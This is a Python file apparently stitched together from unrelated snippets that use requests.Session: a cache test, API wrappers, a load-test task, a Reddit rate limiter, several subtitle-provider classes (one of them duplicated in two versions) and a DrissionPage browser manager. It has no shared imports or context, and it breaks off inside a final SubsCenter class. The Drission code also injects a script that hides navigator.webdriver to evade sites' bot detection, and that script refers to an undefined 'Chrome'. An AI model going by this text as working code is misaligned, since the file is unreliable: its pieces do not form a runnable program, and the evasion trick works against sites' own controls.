def test_close(self):
    """Closing the Session must propagate close() down to the adapter's cache."""
    mocked_cache = mock.Mock(spec=DictCache)
    session = Session()
    session.mount('http://', CacheControlAdapter(mocked_cache))
    session.close()
    assert mocked_cache.close.called
def get_http_request(url, payload, method='POST', headers=None, use_proxy=False,
                     use_proxy_auth=False, trust_env=True):
    """Perform an HTTP request through a short-lived Session.

    :param url: target URL.
    :param payload: sent as body for POST, as query params for GET.
    :param method: HTTP verb; anything other than GET/POST is coerced to POST.
    :param headers: optional headers dict.
    :param use_proxy: route through ``Util.get_proxies()`` when True.
    :param use_proxy_auth: attach ``Util.get_proxy_auth()`` when True.
    :param trust_env: forwarded to ``Session.trust_env``.
    :return: ``(response, error_message)`` — error_message is None on success.
    """
    session = Session()
    try:
        session.trust_env = trust_env
        session.proxies = Util.get_proxies() if use_proxy else None
        session.auth = Util.get_proxy_auth() if use_proxy_auth else None
        request = Request(
            'POST' if method not in ('GET', 'POST') else method,
            url,
            data=payload if method == 'POST' else None,
            params=payload if method == 'GET' else None,
            headers=headers,
        )
        prepped = request.prepare()
        response = session.send(prepped,
                                timeout=app.config['HTTP_REQUESTS_TIMEOUT'])
    except Exception as e:
        # Best-effort error path: hand back an empty Response plus a message.
        # (Previously used py2-only `except Exception, e` and `e.message`, and
        # called raise_for_status() on a blank Response, which is a no-op at
        # best and a TypeError on py3.)
        response = Response()
        return response, 'Error al realizar la consulta - Motivo: {}'.format(e)
    finally:
        # The session was previously leaked whenever an exception occurred.
        session.close()
    # Previously the success path fell off the end and returned None,
    # which broke callers unpacking the (response, error) tuple.
    return response, None
class OneM2MHttpTx(IoTTx):
    """HTTP transmit (Tx) channel for OneM2M primitives."""

    def __init__(self, encoder, decoder):
        super(OneM2MHttpTx, self).__init__(encoder, decoder)
        self.session = None

    def _start(self):
        # The HTTP session only exists while the channel is started.
        self.session = Session()

    def _stop(self):
        if self.session is None:
            return
        self.session.close()
        self.session = None

    def send(self, jsonprimitive):
        """Encode and transmit a primitive; return the decoded reply or None."""
        try:
            outgoing = self.encoder.encode(jsonprimitive)
        except IoTDataEncodeError:
            # Encoding failure: nothing was sent.
            return None
        raw_reply = self.session.send(outgoing)
        try:
            return self.decoder.decode(raw_reply)
        except IoTDataDecodeError:
            # Reply arrived but could not be decoded.
            return None
def hit_example_com(self):
    """Time a GET to example.com and report the outcome to locust events.

    Fires ``events.request_success`` with the measured latency on success,
    ``events.request_failure`` with the raised exception otherwise.
    """
    start_time = time()
    session = Session()
    try:
        # No retries: we want each attempt measured individually.
        http_adapter = HTTPAdapter(max_retries=0)
        session.mount('http://', http_adapter)
        session.mount('https://', http_adapter)
        session.get("http://www.example.com", timeout=30)
        stats_latency['latency'].append(time() - start_time)
        events.request_success.fire(request_type="Transaction",
                                    name="hit_sowatest",
                                    response_time=time() - start_time,
                                    response_length=0)
    except Exception as e:
        # py3-compatible except syntax (was py2-only `except Exception, e`).
        # request_type: method used; name: called URL (or override name);
        # response_time: time until the exception; exception: raised instance.
        events.request_failure.fire(request_type="Transaction",
                                    name="hit_sowatest",
                                    response_time=time() - start_time,
                                    exception=e)
    finally:
        # Previously the session was only closed on the success path.
        session.close()
def send_message(self, request):
    """Transport the message to the server and return the response.

    :param request: The JSON-RPC request string.
    :return: The response (a string for requests, None for notifications).
    """
    session = Session()
    try:
        # Build and prepare the POST request.
        session_request = Request(method='POST', url=self.endpoint,
                                  headers=self.headers, data=request,
                                  **self.requests_kwargs)
        prepared_request = session.prepare_request(session_request)
        # Caller-supplied headers take precedence over the prepared defaults.
        merged_headers = dict(prepared_request.headers)
        merged_headers.update(self.headers)
        prepared_request.headers = merged_headers
        # Log the request
        self.log_request(request, {'http_headers': prepared_request.headers})
        # Send the message
        response = session.send(prepared_request)
    finally:
        # Previously the session leaked if prepare_request()/log_request()
        # raised anything other than RequestException; `finally` closes always
        # and removes the duplicated close-on-error / close-on-success code.
        session.close()
    # Log the response
    self.log_response(response.text, {'http_code': response.status_code,
                                      'http_reason': response.reason,
                                      'http_headers': response.headers})
    return response.text
class PluggitHandler:
    """
    handler is the global network handler for Pluggit. It routes all network
    requests through it in order to respect Reddit API rules. It keeps all
    OAuth requests separate as they are based on a per-user_agent rate-limit.
    """

    def __init__(self, debug=False):
        # Create logger
        self.logger = logging.getLogger('PluggitHandler')
        self.logger.setLevel(logging.DEBUG if debug else logging.INFO)

        # Maps bearer token -> timestamp (seconds) of its last request.
        self.oauth_dict = {}

        # Required by PRAW
        self.session = Session()
        self.lock = Lock()

    def __del__(self):
        # getattr: __del__ can run even if __init__ never completed.
        session = getattr(self, 'session', None)
        if session is not None:
            session.close()

    def request(self, request, proxies, timeout, verify, **kwargs):
        # Evict OAuth sessions idle for more than one hour.  The original
        # predicate (value < time() + 3600) compared past timestamps against a
        # point in the future, so it was always true and nothing was evicted.
        cutoff = time() - 60 * 60
        self.oauth_dict = {key: value for key, value in self.oauth_dict.items()
                           if value > cutoff}

        # Extract the bearer token if the request is OAuth-authenticated.
        oauth_session = None
        if 'Authorization' in request.headers:
            payload = request.headers['Authorization'].split(' ')
            if payload[0] == 'bearer':
                oauth_session = payload[1]

        if oauth_session is not None:
            if oauth_session in self.oauth_dict:
                # Lock to prevent multiple threads hitting the same OAuth
                # session faster than one request per two seconds.
                with self.lock:
                    now = time()
                    wait_time = self.oauth_dict[oauth_session] + 2 - now
                    if wait_time > 0:
                        self.logger.debug(' SESSION: ' + oauth_session +
                                          ' SLEEPING: ' + str(wait_time))
                        now += wait_time
                        sleep(wait_time)
                    self.oauth_dict[oauth_session] = now
            else:
                # First request for this token: just record the timestamp.
                self.oauth_dict[oauth_session] = time()

        return self.session.send(request, proxies=proxies, timeout=timeout,
                                 allow_redirects=False, verify=verify)
class Flowdock:
    """Simple wrapper for Flowdock REST API."""

    API_URL = "https://api.flowdock.com"

    def __init__(self, api_key, debug=False, print_function=None):
        """Initialize Flowdock API wrapper.

        @param debug Print debug info if True
        @param print_function Use this function to print debug info. By
            default use python builtin print. Mainly for using click.echo
            without requiring click as dependency.
        """
        self.session = Session()
        # requests takes HTTP basic auth as a (user, pass) tuple; Flowdock
        # authenticates with the api key alone in the username slot.
        self.session.auth = (api_key, None)
        self.debug = debug
        self.print = print_function if print_function else print

    def get_organizations(self):
        """Get list of organizations this user has access to"""
        url = "{}/organizations".format(self.API_URL)
        if self.debug:
            self.print("Sending GET request to URL {}".format(url))
        resp = self.session.get(url)
        resp.raise_for_status()
        return resp.json()

    def find_user_orgs(self, email):
        """Find organizations this user belongs to"""
        return [org for org in self.get_organizations()
                if Flowdock.user_in_org(email, org)]

    @staticmethod
    def user_in_org(email, org):
        """Check whether the given email belongs to a member of the org."""
        return any(member['email'] == email for member in org['users'])

    def delete_user_from_org(self, user, org):
        """Remove the given user from the given organization."""
        url = "{}/organizations/{}/users/{}".format(
            self.API_URL, org['parameterized_name'], user['id'])
        if self.debug:
            self.print("Sending DELETE request to url {}".format(url))
        resp = self.session.delete(url)
        resp.raise_for_status()

    def close(self):
        """Dispose of the underlying HTTP session."""
        self.session.close()
class TheSubDBProvider(Provider):
    """TheSubDB Provider."""
    languages = {Language.fromthesubdb(l) for l in language_converters['thesubdb'].codes}
    required_hash = 'thesubdb'
    server_url = 'http://api.thesubdb.com/'
    subtitle_class = TheSubDBSubtitle

    def __init__(self):
        self.session = None

    def initialize(self):
        # The API requires a specific User-Agent format.
        self.session = Session()
        self.session.headers['User-Agent'] = ('SubDB/1.0 (subliminal/%s; https://github.com/Diaoul/subliminal)'
                                              % __short_version__)

    def terminate(self):
        self.session.close()

    def query(self, hash):
        """Return every subtitle available for the given file hash."""
        params = {'action': 'search', 'hash': hash}
        logger.info('Searching subtitles %r', params)
        r = self.session.get(self.server_url, params=params, timeout=10)

        # The API signals "nothing found" with a 404 rather than an empty body.
        if r.status_code == 404:
            logger.debug('No subtitles found')
            return []
        r.raise_for_status()

        # The body is a comma-separated list of language codes.
        found = []
        for language_code in r.text.split(','):
            subtitle = self.subtitle_class(Language.fromthesubdb(language_code), hash)
            logger.debug('Found subtitle %r', subtitle)
            found.append(subtitle)
        return found

    def list_subtitles(self, video, languages):
        return [s for s in self.query(video.hashes['thesubdb'])
                if s.language in languages]

    def download_subtitle(self, subtitle):
        logger.info('Downloading subtitle %r', subtitle)
        params = {'action': 'download', 'hash': subtitle.hash,
                  'language': subtitle.language.alpha2}
        r = self.session.get(self.server_url, params=params, timeout=10)
        r.raise_for_status()
        subtitle.content = fix_line_ending(r.content)
def getCurrencys():
    """Fetch the currency list; return the parsed JSON or None on any failure."""
    session = Session()
    try:
        resp = session.get(BASE_URL + CURRENCIES, params={'app_id': APP_ID})
        return json.loads(resp.text)
    except Exception:
        # Best-effort: any network or parse problem yields None.
        return None
    finally:
        session.close()
def getRates():
    """Fetch the latest exchange rates; return the parsed JSON or None on failure."""
    session = Session()
    try:
        resp = session.get(BASE_URL + LATEST_RATES, params={'app_id': APP_ID})
        return json.loads(resp.text)
    except Exception:
        # Best-effort: any network or parse problem yields None.
        return None
    finally:
        session.close()
class NapiProjektProvider(Provider):
    """NapiProjekt Provider."""
    languages = {Language.fromalpha2(l) for l in ['pl']}
    required_hash = 'napiprojekt'
    server_url = 'http://napiprojekt.pl/unit_napisy/dl.php'
    subtitle_class = NapiProjektSubtitle

    def __init__(self):
        self.session = None

    def initialize(self):
        self.session = Session()
        self.session.headers['User-Agent'] = 'Subliminal/%s' % __short_version__

    def terminate(self):
        self.session.close()

    def query(self, language, hash):
        """Look up a single subtitle by file hash; return it or None."""
        params = {'v': 'dreambox', 'kolejka': 'false', 'nick': '', 'pass': '',
                  'napios': 'Linux', 'l': language.alpha2.upper(), 'f': hash,
                  't': get_subhash(hash)}
        logger.info('Searching subtitle %r', params)
        r = self.session.get(self.server_url, params=params, timeout=10)
        r.raise_for_status()

        # The server answers with the magic bytes 'NPc0' when it has nothing.
        if r.content[:4] == b'NPc0':
            logger.debug('No subtitles found')
            return None

        subtitle = self.subtitle_class(language, hash)
        subtitle.content = r.content
        logger.debug('Found subtitle %r', subtitle)
        return subtitle

    def list_subtitles(self, video, languages):
        candidates = (self.query(l, video.hashes['napiprojekt']) for l in languages)
        return [s for s in candidates if s is not None]

    def download_subtitle(self, subtitle):
        # Content is already populated during listing; nothing to download.
        pass
class TheSubDBProvider(Provider):
    """TheSubDB subtitle provider."""
    languages = {Language.fromthesubdb(l) for l in language_converters["thesubdb"].codes}
    required_hash = "thesubdb"
    server_url = "http://api.thesubdb.com/"

    def initialize(self):
        self.session = Session()
        # Set only the User-Agent key instead of replacing the whole headers
        # mapping: the previous wholesale assignment silently discarded
        # requests' default headers (Accept-Encoding, Connection, ...), and is
        # inconsistent with the other providers in this file.
        self.session.headers["User-Agent"] = (
            "SubDB/1.0 (subliminal/%s; https://github.com/Diaoul/subliminal)"
            % get_version(__version__)
        )

    def terminate(self):
        self.session.close()

    def query(self, hash):
        """Return every subtitle available for the given file hash."""
        # make the query
        params = {"action": "search", "hash": hash}
        logger.info("Searching subtitles %r", params)
        r = self.session.get(self.server_url, params=params, timeout=10)

        # handle subtitles not found (404) and other errors
        if r.status_code == 404:
            logger.debug("No subtitles found")
            return []
        r.raise_for_status()

        # the body is a comma-separated list of language codes
        subtitles = []
        for language_code in r.text.split(","):
            language = Language.fromthesubdb(language_code)
            subtitle = TheSubDBSubtitle(language, hash)
            logger.debug("Found subtitle %r", subtitle)
            subtitles.append(subtitle)
        return subtitles

    def list_subtitles(self, video, languages):
        return [s for s in self.query(video.hashes["thesubdb"])
                if s.language in languages]

    def download_subtitle(self, subtitle):
        logger.info("Downloading subtitle %r", subtitle)
        params = {"action": "download", "hash": subtitle.hash,
                  "language": subtitle.language.alpha2}
        r = self.session.get(self.server_url, params=params, timeout=10)
        r.raise_for_status()
        subtitle.content = fix_line_ending(r.content)
class ShooterProvider(Provider):
    """Shooter Provider."""
    languages = {Language(l) for l in ['eng', 'zho']}
    server_url = 'https://www.shooter.cn/api/subapi.php'
    subtitle_class = ShooterSubtitle

    def __init__(self):
        self.session = None

    def initialize(self):
        self.session = Session()
        self.session.headers['User-Agent'] = 'Subliminal/%s' % __short_version__

    def terminate(self):
        self.session.close()

    def query(self, language, filename, hash=None):
        """Query the server for subtitles matching the file name/hash."""
        params = {'filehash': hash, 'pathinfo': os.path.realpath(filename),
                  'format': 'json', 'lang': language.shooter}
        logger.debug('Searching subtitles %r', params)
        r = self.session.post(self.server_url, params=params, timeout=10)
        r.raise_for_status()

        # A single 0xFF byte in the body means "nothing found".
        if r.content == b'\xff':
            logger.debug('No subtitles found')
            return []

        # Each result groups several files; flatten them into subtitles.
        results = json.loads(r.text)
        return [self.subtitle_class(language, hash, entry['Link'])
                for item in results for entry in item['Files']]

    def list_subtitles(self, video, languages):
        return [s for l in languages
                for s in self.query(l, video.name, video.hashes.get('shooter'))]

    def download_subtitle(self, subtitle):
        logger.info('Downloading subtitle %r', subtitle)
        r = self.session.get(subtitle.download_link, timeout=10)
        r.raise_for_status()
        subtitle.content = fix_line_ending(r.content)
def try_request(self, request):
    """Place a secure request and get back an object of type T.

    Args:
        request: Result object of the request

    Returns:
        Parsed JSON body on success, or ``{'success': False}`` on any failure.
    """
    timestamp = int(time())
    # Renamed from `hash`, which shadowed the builtin.
    secure_hash = create_secure_hash(timestamp, self.token)
    request.auth = (self.userId, secure_hash)
    request.headers.update({'Timestamp': str(timestamp)})
    request.url = self.client + request.url
    session = Session()
    try:
        response = session.send(request.prepare())
        return response.json()
    except Exception:
        # Narrowed from a bare `except:` (which also trapped SystemExit and
        # KeyboardInterrupt); still best-effort by design.
        exception('Failed to make REST request to {0}'.format(request.url))
        return {'success': False}
    finally:
        # Previously the session leaked whenever send()/json() raised.
        session.close()
class HTMLFetcher(BaseFetcher):
    '''
    A fetcher which uses requests to return source html of a webpage
    without rendering JS. Faster but less thourough than JSFetcher
    '''

    def setup(self, timeout):
        # Per-request timeout (seconds) used by get().
        self.timeout = timeout
        self.session = Session()

    def teardown(self):
        self.session.close()
        return None

    def get(self, url):
        """Return the page body for *url*, or '' on any failure."""
        logging.info("retrieving: " + url)
        try:
            rsp = self.session.get(url, timeout=self.timeout)
            if not rsp:
                # A falsy Response means a non-2xx/3xx status; treat as empty.
                return ''
            return rsp.text
        except Exception as e:
            # logging.warn is deprecated -> logging.warning.  Also log the
            # exception itself instead of e.__traceback__, whose str() is just
            # an unhelpful "<traceback object at 0x...>".
            logging.warning("caught <{0}> while retrieving <{1}>".format(e, url))
            return ''
def _request_api(self, path, data=None, method="GET"):
    """Helper method for making a REST-compliant API call.

    Args:
        path: path on the server to call
        data: dictionary of data to send to the server in message body
        method: - HTTP verb to use for the request
    Returns:
        the JSON-parsed result body
    """
    complete_path = self.api_endpoint + path
    # One short-lived session per call, carrying the instance-wide headers.
    session = Session()
    session.headers.update(self.headers)
    try:
        response = session.request(method, complete_path, json=data)
    finally:
        session.close()
    # NOTE(review): response.json() is evaluated inside this condition, i.e.
    # BEFORE the empty-body check below — an empty or non-JSON body on a
    # non-2xx status would raise here rather than fall through. Preserved
    # as-is; confirm against the API's error contract before changing.
    if 200 <= response.status_code < 300 or self._has_error(response.json()):
        if response.text == '':
            return {}
        return response.json()
    elif response.status_code in ERROR_MESSAGES:
        # Known error statuses map to canned messages.
        return {'error': ERROR_MESSAGES[response.status_code]}
    # Anything else is an unexpected failure: log and return a generic error.
    logger.warn("Querying the API failed when accessing '%s': %d",
                complete_path, response.status_code)
    return {'error': {
        'message': "internal_server_error",
        'description': "We are very sorry, but something went wrong",
        'code': 90000}}
class TVsubtitlesProvider(Provider):
    """TVsubtitles Provider."""
    languages = {Language('por', 'BR')} | {
        Language(l) for l in [
            'ara', 'bul', 'ces', 'dan', 'deu', 'ell', 'eng', 'fin', 'fra',
            'hun', 'ita', 'jpn', 'kor', 'nld', 'pol', 'por', 'ron', 'rus',
            'spa', 'swe', 'tur', 'ukr', 'zho'
        ]
    }
    video_types = (Episode, )
    server_url = 'http://www.tvsubtitles.net/'
    subtitle_class = TVsubtitlesSubtitle

    def __init__(self):
        # Session is created lazily in initialize().
        self.session = None

    def initialize(self):
        self.session = Session()
        self.session.headers[
            'User-Agent'] = 'Subliminal/%s' % __short_version__

    def terminate(self):
        self.session.close()

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def search_show_id(self, series, year=None):
        """Search the show id from the `series` and `year`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int
        :return: the show id, if any.
        :rtype: int
        """
        # make the search
        logger.info('Searching show id for %r', series)
        r = self.session.post(self.server_url + 'search.php',
                              data={'q': series}, timeout=10)
        r.raise_for_status()

        # get the series out of the suggestions
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])
        show_id = None
        for suggestion in soup.select('div.left li div a[href^="/tvshow-"]'):
            match = link_re.match(suggestion.text)
            if not match:
                logger.error('Failed to match %s', suggestion.text)
                continue

            if match.group('series').lower() == series.lower():
                if year is not None and int(match.group('first_year')) != year:
                    logger.debug('Year does not match')
                    continue
                # href looks like "/tvshow-<id>.html": slice out the id.
                show_id = int(suggestion['href'][8:-5])
                logger.debug('Found show id %d', show_id)
                break

        return show_id

    @region.cache_on_arguments(expiration_time=EPISODE_EXPIRATION_TIME)
    def get_episode_ids(self, show_id, season):
        """Get episode ids from the show id and the season.

        :param int show_id: show id.
        :param int season: season of the episode.
        :return: episode ids per episode number.
        :rtype: dict
        """
        # get the page of the season of the show
        logger.info('Getting the page of show id %d, season %d', show_id, season)
        r = self.session.get(self.server_url + 'tvshow-%d-%d.html' % (show_id, season),
                             timeout=10)
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # loop over episode rows
        episode_ids = {}
        for row in soup.select('table#table5 tr'):
            # skip rows that do not have a link to the episode page
            if not row('a', href=episode_id_re):
                continue

            # extract data from the cells
            cells = row('td')
            # first cell text is "<season>x<episode>"
            episode = int(cells[0].text.split('x')[1])
            episode_id = int(cells[1].a['href'][8:-5])
            episode_ids[episode] = episode_id

        if episode_ids:
            logger.debug('Found episode ids %r', episode_ids)
        else:
            logger.warning('No episode ids found')

        return episode_ids

    def query(self, show_id, series, season, episode, year=None):
        """Scrape the episode page for all available subtitles."""
        # get the episode ids
        episode_ids = self.get_episode_ids(show_id, season)
        if episode not in episode_ids:
            logger.error('Episode %d not found', episode)
            return []

        # get the episode page
        logger.info('Getting the page for episode %d', episode_ids[episode])
        r = self.session.get(self.server_url + 'episode-%d.html' % episode_ids[episode],
                             timeout=10)
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # loop over subtitles rows
        subtitles = []
        for row in soup.select('.subtitlen'):
            # read the item; the img src encodes the language code
            language = Language.fromtvsubtitles(row.h5.img['src'][13:-4])
            subtitle_id = int(row.parent['href'][10:-5])
            page_link = self.server_url + 'subtitle-%d.html' % subtitle_id
            rip = row.find('p', title='rip').text.strip() or None
            release = row.find('h5').text.strip() or None

            subtitle = self.subtitle_class(language, page_link, subtitle_id,
                                           series, season, episode, year, rip,
                                           release)
            logger.debug('Found subtitle %s', subtitle)
            subtitles.append(subtitle)

        return subtitles

    def list_subtitles(self, video, languages):
        # lookup show_id: try the main series name, then the alternatives
        titles = [video.series] + video.alternative_series
        show_id = None
        for title in titles:
            show_id = self.search_show_id(title, video.year)
            if show_id is not None:
                break

        # query for subtitles with the show_id
        if show_id is not None:
            subtitles = [
                s for s in self.query(show_id, title, video.season,
                                      video.episode, video.year)
                if s.language in languages and s.episode == video.episode
            ]
            if subtitles:
                return subtitles
        else:
            logger.error('No show id found for %r (%r)', video.series,
                         {'year': video.year})

        return []

    def download_subtitle(self, subtitle):
        # download as a zip
        logger.info('Downloading subtitle %r', subtitle)
        r = self.session.get(self.server_url + 'download-%d.html' % subtitle.subtitle_id,
                             timeout=10)
        r.raise_for_status()

        # open the zip
        with ZipFile(io.BytesIO(r.content)) as zf:
            if len(zf.namelist()) > 1:
                raise ProviderError('More than one file to unzip')

            subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
class Drission(object):
    """Drission manages the WebDriver object and the Session object; it plays
    the role of the driver behind the page classes."""

    def __init__(self,
                 driver_or_options: Union[WebDriver, dict, Options, DriverOptions] = None,
                 session_or_options: Union[Session, dict, SessionOptions] = None,
                 ini_path: str = None,
                 proxy: dict = None):
        """Initialise. Accepts ready-made WebDriver and Session objects, or
        their configuration from which the objects are created on demand.

        :param driver_or_options: driver object or chrome settings (Options class or settings dict)
        :param session_or_options: Session object or settings
        :param ini_path: path to the ini file
        :param proxy: proxy settings
        """
        self._session = None
        self._driver = None
        self._debugger = None
        self._proxy = proxy

        # Only read the ini file when at least one side must be built from it.
        om = OptionsManager(
            ini_path
        ) if session_or_options is None or driver_or_options is None else None

        # ------------------handle session options----------------------
        if session_or_options is None:
            self._session_options = om.session_options

        else:
            # If a Session object is received, record it directly
            if isinstance(session_or_options, Session):
                self._session = session_or_options

            # Otherwise record its configuration
            else:
                self._session_options = _session_options_to_dict(
                    session_or_options)

        # ------------------handle driver options----------------------
        if driver_or_options is None:
            self._driver_options = om.chrome_options
            self._driver_options['driver_path'] = om.get_value(
                'paths', 'chromedriver_path')

        else:
            # If a WebDriver object is received, record it directly
            if isinstance(driver_or_options, WebDriver):
                self._driver = driver_or_options

            # Otherwise record its configuration
            else:
                self._driver_options = _chrome_options_to_dict(
                    driver_or_options)

    @property
    def session(self) -> Session:
        """Return the Session object; create it from the recorded
        configuration if it has not been initialised yet."""
        if self._session is None:
            self._set_session(self._session_options)

            if self._proxy:
                self._session.proxies = self._proxy

        return self._session

    @property
    def driver(self) -> WebDriver:
        """Return the WebDriver object; create it from the recorded
        configuration if it has not been initialised yet.
        If a local debug browser is configured, attach to it or launch the
        browser process automatically.
        """
        if self._driver is None:
            if isinstance(self._driver_options, dict):
                options = _dict_to_chrome_options(self._driver_options)
            else:
                raise TypeError('Driver options invalid')

            if self._proxy:
                options.add_argument(f'--proxy-server={self._proxy["http"]}')

            driver_path = self._driver_options.get('driver_path', None) or 'chromedriver'
            chrome_path = self._driver_options.get('binary_location', None) or 'chrome.exe'

            # -----------If a debug port is specified and not in use, start the browser process first-----------
            if options.debugger_address and _check_port(
                    options.debugger_address) is False:
                from subprocess import Popen
                port = options.debugger_address[options.debugger_address.
                                                rfind(':') + 1:]

                try:
                    self._debugger = Popen(
                        f'{chrome_path} --remote-debugging-port={port}',
                        shell=False)

                    if chrome_path == 'chrome.exe':
                        from common import get_exe_path_from_port
                        chrome_path = get_exe_path_from_port(port)

                # Process could not be started: look up the browser executable and launch it
                except FileNotFoundError:
                    from DrissionPage.easy_set import _get_chrome_path
                    chrome_path = _get_chrome_path(show_msg=False)

                    if not chrome_path:
                        raise FileNotFoundError('无法找到chrome.exe路径,请手动配置。')

                    self._debugger = Popen(
                        f'"{chrome_path}" --remote-debugging-port={port}',
                        shell=False)

            # -----------create the WebDriver object-----------
            try:
                self._driver = webdriver.Chrome(driver_path, options=options)

            # If the version does not match, fetch the matching chromedriver and retry
            except (WebDriverException, SessionNotCreatedException):
                from .easy_set import get_match_driver
                chrome_path = None if chrome_path == 'chrome.exe' else chrome_path
                driver_path = get_match_driver(chrome_path=chrome_path,
                                               check_version=False,
                                               show_msg=False)

                if driver_path:
                    try:
                        self._driver = webdriver.Chrome(driver_path,
                                                        options=options)
                    except:
                        print('无法启动,请检查chromedriver版本与Chrome是否匹配,并手动设置。')
                        exit(0)

                # When no driver is found and chrome_path is None, the installed version
                # is too new; search the system path instead
                elif chrome_path is None and driver_path is None:
                    from DrissionPage.easy_set import _get_chrome_path
                    chrome_path = _get_chrome_path(show_msg=False,
                                                   from_ini=False,
                                                   from_regedit=False)
                    driver_path = get_match_driver(chrome_path=chrome_path,
                                                   check_version=False,
                                                   show_msg=False)

                    if driver_path:
                        options.binary_location = chrome_path
                        try:
                            self._driver = webdriver.Chrome(driver_path,
                                                            options=options)
                        except:
                            print('无法启动,请检查chromedriver版本与Chrome是否匹配,并手动设置。')
                            exit(0)
                    else:
                        print('无法启动,请检查chromedriver版本与Chrome是否匹配,并手动设置。')
                        exit(0)

                else:
                    print('无法启动,请检查chromedriver版本与Chrome是否匹配,并手动设置。')
                    exit(0)

            # Anti-anti-crawling tweak: mask navigator.webdriver
            try:
                self._driver.execute_script(
                    'Object.defineProperty(navigator,"webdriver",{get:() => Chrome,});'
                )
            except:
                pass

            # self._driver.execute_cdp_cmd(
            #     'Page.addScriptToEvaluateOnNewDocument',
            #     {'source': 'Object.defineProperty(navigator,"webdriver",{get:() => Chrome,});'})

        return self._driver

    @property
    def debugger_progress(self):
        """The debug browser process."""
        return self._debugger

    @property
    def driver_options(self) -> dict:
        """Return the driver configuration."""
        return self._driver_options

    @property
    def session_options(self) -> dict:
        """Return the session configuration."""
        return self._session_options

    @session_options.setter
    def session_options(self, options: Union[dict, SessionOptions]) -> None:
        """Set the session configuration.

        :param options: session configuration dict
        :return: None
        """
        self._session_options = _session_options_to_dict(options)
        self._set_session(self._session_options)

    @property
    def proxy(self) -> Union[None, dict]:
        """Return the proxy settings."""
        return self._proxy

    @proxy.setter
    def proxy(self, proxies: dict = None) -> None:
        """Set the proxy settings.

        :param proxies: proxy settings dict
        :return: None
        """
        self._proxy = proxies

        if self._session:
            self._session.proxies = proxies

        if self._driver:
            # The driver must be recreated for a proxy change to take effect;
            # preserve cookies and the current URL across the restart.
            cookies = self._driver.get_cookies()
            url = self._driver.current_url
            self._driver.quit()
            self._driver = None
            self._driver = self.driver
            self._driver.get(url)

            for cookie in cookies:
                self.set_cookies(cookie, set_driver=True)

    def set_cookies(self,
                    cookies: Union[RequestsCookieJar, list, tuple, str, dict],
                    set_session: bool = False,
                    set_driver: bool = False) -> None:
        """Set cookies.

        :param cookies: cookie data; may be CookieJar, list, tuple, str or dict
        :param set_session: whether to set the session's cookies
        :param set_driver: whether to set the driver's cookies
        :return: None
        """
        cookies = _cookies_to_tuple(cookies)

        for cookie in cookies:
            if cookie['value'] is None:
                cookie['value'] = ''

            # Add the cookie to the session
            if set_session:
                kwargs = {
                    x: cookie[x]
                    for x in cookie
                    if x.lower() not in ('name', 'value', 'httponly', 'expiry',
                                         'samesite')
                }

                if 'expiry' in cookie:
                    kwargs['expires'] = cookie['expiry']

                self.session.cookies.set(cookie['name'], cookie['value'],
                                         **kwargs)

            # Add the cookie to the driver
            if set_driver:
                if 'expiry' in cookie:
                    cookie['expiry'] = int(cookie['expiry'])

                try:
                    browser_domain = extract(self.driver.current_url).fqdn
                except AttributeError:
                    browser_domain = ''

                if not cookie.get('domain', None):
                    if browser_domain:
                        url = extract(browser_domain)
                        cookie_domain = f'{url.domain}.{url.suffix}'
                    else:
                        raise ValueError(
                            'There is no domain name in the cookie or the browser has not visited a URL.'
                        )

                    cookie['domain'] = cookie_domain

                else:
                    cookie_domain = cookie['domain'] if cookie['domain'][
                        0] != '.' else cookie['domain'][1:]

                if cookie_domain not in browser_domain:
                    self.driver.get(cookie_domain if cookie_domain.startswith(
                        'http://') else f'http://{cookie_domain}')

                # Avoid selenium auto-prefixing '.' which would prevent
                # correctly overwriting an existing cookie
                if cookie['domain'][0] != '.':
                    c = self.driver.get_cookie(cookie['name'])
                    if c and c['domain'] == cookie['domain']:
                        self.driver.delete_cookie(cookie['name'])

                self.driver.add_cookie(cookie)

    def _set_session(self, data: dict) -> None:
        # Create the session on first use, then apply the recorded attributes.
        if self._session is None:
            self._session = Session()

        attrs = [
            'headers', 'auth', 'proxies', 'hooks', 'params', 'verify', 'cert',
            'stream', 'trust_env', 'max_redirects'
        ]  # , 'adapters'

        if 'cookies' in data:
            self.set_cookies(data['cookies'], set_session=True)

        for i in attrs:
            if i in data:
                self._session.__setattr__(i, data[i])

    def cookies_to_session(self, copy_user_agent: bool = False) -> None:
        """Copy the driver's cookies to the session object.

        :param copy_user_agent: whether to copy the user-agent as well
        :return: None
        """
        if copy_user_agent:
            self.user_agent_to_session(self.driver, self.session)

        self.set_cookies(self.driver.get_cookies(), set_session=True)

    def cookies_to_driver(self, url: str) -> None:
        """Copy the session's cookies to the driver object.

        :param url: scope (domain) the cookies apply to
        :return: None
        """
        browser_domain = extract(self.driver.current_url).fqdn
        ex_url = extract(url)

        if ex_url.fqdn not in browser_domain:
            self.driver.get(url)

        domain = f'{ex_url.domain}.{ex_url.suffix}'

        cookies = []
        for cookie in self.session.cookies:
            if cookie.domain == '':
                cookie.domain = domain

            if domain in cookie.domain:
                cookies.append(cookie)

        self.set_cookies(cookies, set_driver=True)

    def user_agent_to_session(self,
                              driver: WebDriver = None,
                              session: Session = None) -> None:
        """Copy the driver's user-agent to the session.

        :param driver: source driver object
        :param session: target session object
        :return: None
        """
        driver = driver or self.driver
        session = session or self.session
        selenium_user_agent = driver.execute_script(
            "return navigator.userAgent;")
        session.headers.update({"User-Agent": selenium_user_agent})

    def close_driver(self) -> None:
        """Close the driver and the browser."""
        if self._driver:
            self._driver.quit()
            self._driver = None

    def close_session(self) -> None:
        """Close the session."""
        if self._session:
            self._session.close()
            self._session = None

    def close(self) -> None:
        """Close the session, the driver and the browser."""
        if self._driver:
            self.close_driver()

        if self._session:
            self.close_session()

    def __del__(self):
        """Close the browser and the Session when this object is destroyed."""
        try:
            self.close()
        except ImportError:
            pass
class SubsCenterProvider(Provider):
    """SubsCenter Provider."""
    languages = {Language.fromalpha2(l) for l in ['he']}
    server_url = 'http://www.subscenter.info/he/'

    def __init__(self, username=None, password=None):
        # Credentials are optional, but must be supplied together.
        if username is not None and password is None or username is None and password is not None:
            raise ConfigurationError('Username and password must be specified')

        self.session = None
        self.username = username
        self.password = password
        self.logged_in = False

    def initialize(self):
        self.session = Session()
